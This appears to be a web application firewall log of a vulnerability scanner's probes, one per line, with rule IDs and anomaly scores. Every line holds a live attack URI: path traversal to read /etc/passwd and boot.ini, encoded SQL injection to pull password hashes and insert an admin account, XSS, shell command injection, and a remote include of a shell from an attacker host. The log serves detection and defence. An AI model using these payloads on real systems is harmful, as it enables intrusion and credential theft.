TimeStamp [18/May/2022:10:51:03 +0200]	Uri [/cgi-bin//dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:05 +0200]	Uri [/scripts/convert.bas?../../setuplog.txt]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:05 +0200]	Uri [/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1]	PLmin [1]	Score [40]	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:06 +0200]	Uri [/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:08 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69o%6e%20%73e%6c%65%63t%20o%72%64%28sub%73%74%72i%6e%67%28u%73e%72%5f%70as%73w%6f%72%64]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:09 +0200]	Uri [/cgi-bin/results.jsp?query=%22%3E%3Cscript%3Efoo%3C/script%3E%22]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:10 +0200]	Uri [/cgi-bin/filemail.pl%0D]	PLmin [1]	Score [5]	Nattacks [2]	[921190]	[949110]
TimeStamp [18/May/2022:10:51:10 +0200]	Uri [/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09mister_r%40ceres%2Eugr%2Ees]	PLmin [1]	Score [5]	Nattacks [2]	[932100]	[949110]
TimeStamp [18/May/2022:10:51:11 +0200]	Uri [/%00/]	PLmin [1]	Score [5]	Nattacks [2]	[920270]	[949110]
TimeStamp [18/May/2022:10:51:11 +0200]	Uri [/fcgi-bin/echo.exe?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:12 +0200]	Uri [/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:13 +0200]	Uri [/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=%3Bcat%20/etc/hosts%7C&CODE=PHOLD]	PLmin [1]	Score [10]	Nattacks [3]	[930120]	[932100]	[949110]
TimeStamp [18/May/2022:10:51:14 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73el%65c%74%20ord%28s%75b%73t%72%69n%67%28%75ser%5fpa%73s%77ord]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:15 +0200]	Uri [/graphics/sml3com%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s]	PLmin [1]	Score [0]	Nattacks [1]	[920220]
TimeStamp [18/May/2022:10:51:16 +0200]	Uri [/eManager/Content%20Management/ContentFilter.dll]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:17 +0200]	Uri [/_vti_bin/_vti_aut/fp30reg.dll]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:17 +0200]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2B]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:18 +0200]	Uri [/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/hosts]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:19 +0200]	Uri [/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/host.allow%00]	PLmin [1]	Score [40]	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:20 +0200]	Uri [/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini]	PLmin [1]	Score [35]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:20 +0200]	Uri [/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:21 +0200]	Uri [/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/host.allow]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:22 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20s%65%6c%65%63%74%20%6f%72%64%28%73%75%62%73%74%72in%67%28u%73e%72%5f%70a%73swo%72%64%2c%33%2c%31%29%29%20%66%72o%6d%20phpbb%5f%75se%72s%20%77h%65%72e%20%75%73e%72_i%64=2/%2a&view=newest]	PLmin [1]	Score [15]	Nattacks [4]	[942190]	[942270]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:24 +0200]	Uri [/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd]	PLmin [1]	Score [30]	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:25 +0200]	Uri [/scripts/autoexec.bat%22%2B&%2Bdir%2Bc:/windows/system32%2B.com]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:25 +0200]	Uri [/cgi-bin/day5datacopier.cgi?distloc=%3Bcat%20/etc/passwd%0D]	PLmin [1]	Score [15]	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:26 +0200]	Uri [/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/hosts]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:27 +0200]	Uri [/%7Eroot/NonExistent.html?configure=../../../../../../../../etc/passw]	PLmin [1]	Score [25]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:28 +0200]	Uri [/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert%28%27Vulnerable%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:29 +0200]	Uri [/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:29 +0200]	Uri [/_private/form_results.txt%0D]	PLmin [1]	Score [5]	Nattacks [2]	[921190]	[949110]
TimeStamp [18/May/2022:10:51:30 +0200]	Uri [/cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:31 +0200]	Uri [/servlet/Sygate.Servlet.login?uid=%27%3binsert%20into%20CMS35%2eAdmin%20%28RecUpdateTime%2cLoginName%2cAdminNickName%2cPassword%2cAdminRights%2cAdminEmail%2cFailedLogin%2cAlertOnFailure%2cAlertFailureThreshold%2cOnlineState%29%20values%20%28getutcdate%28%29%2c%27reporting%27%2c%27reporting%27%2c0x10DDD9DCF0A5244E8BED97B540D1CE14E8D54A8E%2c%27255%27%2c%27%27%2c0%2c0%2c0%2c0%29%20%2d%2d%20&up=foo]	PLmin [1]	Score [10]	Nattacks [3]	[942350]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:32 +0200]	Uri [/intranet/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%250]	PLmin [1]	Score [28]	Nattacks [5]	[920220]	[930100]	[930110]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:33 +0200]	Uri [/cgi-bin/sendtemp.pl?templ=/etc/hosts]	PLmin [1]	Score [5]	Nattacks [2]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:34 +0200]	Uri [/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [50]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:35 +0200]	Uri [/common/listrec.pl?APP=qmh-news&TEMPLATE=%3Bls%20/etc%7C]	PLmin [1]	Score [5]	Nattacks [2]	[932100]	[949110]
TimeStamp [18/May/2022:10:51:36 +0200]	Uri [/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00]	PLmin [1]	Score [55]	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:37 +0200]	Uri [/phpBB/viewtopic.php?t=17071&highlight=%22%3E%22%3CScript%3Ejavascript:alert%28d]	PLmin [1]	Score [25]	Nattacks [6]	[941100]	[941110]	[941160]	[941170]	[941210]	[949110]
TimeStamp [18/May/2022:10:51:38 +0200]	Uri [/PHPLibrary-1.5.3/example/lib/stphpform.php?cfg_dir=http://www.atacante.com/shell.txt?&]	PLmin [1]	Score [5]	Nattacks [2]	[931120]	[949110]
TimeStamp [18/May/2022:10:51:39 +0200]	Uri [/global.inc]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:40 +0200]	Uri [/cfdocs/exampleapp/email/getfile.cfm?filename=c:%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [2]	[930120]	[949110]
TimeStamp [18/May/2022:10:51:40 +0200]	Uri [/servlet/org.apache.catalina.Context/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [5]	Nattacks [2]	[941110]	[949110]
TimeStamp [18/May/2022:10:51:40 +0200]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69%6fn%20%73ele%63%74%20o%72%64%28s%75b%73t%72i%6eg%28%75s%65%72%5f%70%61s%73%77ord]	PLmin [1]	Score [10]	Nattacks [3]	[942190]	[942360]	[949110]
TimeStamp [18/May/2022:10:51:41 +0200]	Uri [/mall_log_files/order.log]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:42 +0200]	Uri [/cgi-bin/view-source?../../../../../../../etc/host.equiv]	PLmin [1]	Score [10]	Nattacks [3]	[930100]	[930110]	[949110]
TimeStamp [18/May/2022:10:51:43 +0200]	Uri [/eManager/Email%20Management/cgi-bin/register.dll]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:43 +0200]	Uri [/ROADS/cgi-bin/search.pl?form=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
TimeStamp [18/May/2022:10:51:44 +0200]	Uri [/database/philboard.mdb]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:44 +0200]	Uri [/misc.php?do=page&template=%7B%24%7Bsystem%28id%29%7D%7D]	PLmin [1]	Score [10]	Nattacks [3]	[932130]	[933160]	[949110]
TimeStamp [18/May/2022:10:51:45 +0200]	Uri [/servlet/org.apache.catalina.servlets.WebdavStatus/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E]	PLmin [1]	Score [5]	Nattacks [2]	[941110]	[949110]
TimeStamp [18/May/2022:10:51:46 +0200]	Uri [/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert%28%22G%22%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
TimeStamp [18/May/2022:10:51:47 +0200]	Uri [/cgi-bin/quikstore.cfg]	PLmin [1]	Score [5]	Nattacks [2]	[920440]	[949110]
TimeStamp [18/May/2022:10:51:47 +0200]	Uri [/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts.allow%00]	PLmin [1]	Score [45]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
